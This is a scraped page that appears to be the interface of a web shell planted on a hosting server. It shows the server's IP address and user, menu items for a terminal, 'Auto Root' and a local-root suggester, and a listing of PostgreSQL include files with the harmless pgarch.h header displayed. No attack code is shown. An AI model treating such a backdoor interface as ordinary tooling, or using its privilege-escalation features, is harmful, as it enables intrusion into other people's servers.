Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
pgsql /
server /
postmaster /
Delete
Unzip
Name
Size
Permission
Date
Action
autovacuum.h
1.92
KB
-rw-r--r--
2021-06-15 13:00
bgwriter.h
1.21
KB
-rw-r--r--
2021-06-15 13:00
fork_process.h
447
B
-rw-r--r--
2021-06-15 13:00
pgarch.h
641
B
-rw-r--r--
2021-06-15 13:00
postmaster.h
1.73
KB
-rw-r--r--
2021-06-15 13:00
startup.h
635
B
-rw-r--r--
2021-06-15 13:00
syslogger.h
2.51
KB
-rw-r--r--
2021-06-15 13:00
walwriter.h
487
B
-rw-r--r--
2021-06-15 13:00
Save
Rename
/*------------------------------------------------------------------------- * * pgarch.h * Exports from postmaster/pgarch.c. * * Portions Copyright (c) 1996-2012, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * src/include/postmaster/pgarch.h * *------------------------------------------------------------------------- */ #ifndef _PGARCH_H #define _PGARCH_H /* ---------- * Functions called from postmaster * ---------- */ extern int pgarch_start(void); #ifdef EXEC_BACKEND extern void PgArchiverMain(int argc, char *argv[]); #endif #endif /* _PGARCH_H */